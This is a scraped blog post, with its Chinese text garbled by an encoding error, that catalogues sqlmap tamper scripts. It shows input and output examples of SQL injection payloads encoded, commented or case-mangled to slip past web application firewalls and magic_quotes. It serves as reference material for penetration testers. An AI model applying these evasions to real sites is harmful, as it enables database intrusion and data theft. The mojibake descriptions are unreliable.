ע ¼  
 ӹע
   ʾһ  |  ر
ܰʾ΢֤Ƶ΢ʺŰѹڣ°󶨣°΢  |  ر

 
 
 
 
 

־

 
 

Sqlmap Tamperȫ3  

2014-08-12 10:44:42|  ࣺ WAFƹ |  ǩ |ٱ |ֺС 

  LOFTER ҵƬ  |
űsp_password.py
ã׷sp_passwordDBMS־ԶģЧغɵĩβ
Example:

1
2
('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'

Requirement:
* MSSQL
űchardoubleencode.py ˫url(Ա)
Example:

1
2
* Input: SELECT FIELD FROM%20TABLE
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

űunionalltounion.py
ã滻UNION ALL SELECT UNION SELECT
Example:

1
2
('-1 UNION ALL SELECT')
'-1 UNION SELECT'

Requirement:
all
-
űcharencode.py
ãurl
Example:

1
2
* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
  • Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
  •  The web server will anyway pass the url-decoded version behind,hence it should work against any DBMS
űrandomcase.py
ãСд
Example:

1
2
* Input: INSERT
* Output: InsERt

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
-
űunmagicquotes.py
ãַƹ GPC  addslashes
Example:

1
2
* Input: 1 AND 1=1
* Output: 1%bf%27 AND 1=1C%20

Notes:
  • Useful for bypassing magic_quotes/addslashes feature
C
űrandomcomments.py
ã/**/ָsqlؼ
Example:
1
INSERT becomes IN//S//ERT
űversionedkeywords.py
ãEncloses each non-function keyword with versioned MySQL comment
Example:

1
2
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

Requirement:
* MySQL
 -
űcharunicodeencode.py
ãַ unicode
Example:

1
2
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045

Requirement:

* ASP
* ASP.NET
Tested against:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
* MySQL 5.1.56
* PostgreSQL 9.0.3
Notes:
  • Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset
 -
űsecuresphere.py
ã׷Ƶַ
Example:

1
2
('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'"

Tested against:
all
 -
űversionedmorekeywords.py
ãעƹ
Example:

1
2
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

Requirement:
* MySQL >= 5.1.13
 -
űspace2comment.py
ãReplaces space character ( ) with comments /**/
Example:

1
2
* Input: SELECT id FROM users
* Output: SELECT//id//FROM/**/users

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
  • Useful to bypass weak and bespoke web application firewalls
 -
űhalfversionedmorekeywords.py
ãؼǰע
Example:

1
2
* Input: value UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND QDWa='QDWa
* Output: value/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND QDWa='QDWa

Requirement:
* MySQL < 5.1
Tested against:
* MySQL 4.0.18, 5.0.22
 -
 
 
Ķ(76)| (0)
Ƽ

ʷϵĽ

LOFTERĸ

<#--־Ⱥ־--> <#--Ƽ־--> <#--ü¼--> <#--Ƽ--> <#--Ķ--> <#--ҳƼ--> <#--ʷϵĽ--> <#--Ƽ־--> <#--һƪһƪ--> <#-- ȶ --> <#-- Ź --> <#--ұģṹ--> <#--ģṹ--> <#--ģṹ--> <#--ͶƱ-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

ҳ

ҵƬ - ͷ - ֻ - LOFTER APP - Ĵ˲

׹˾Ȩ ©1997-2017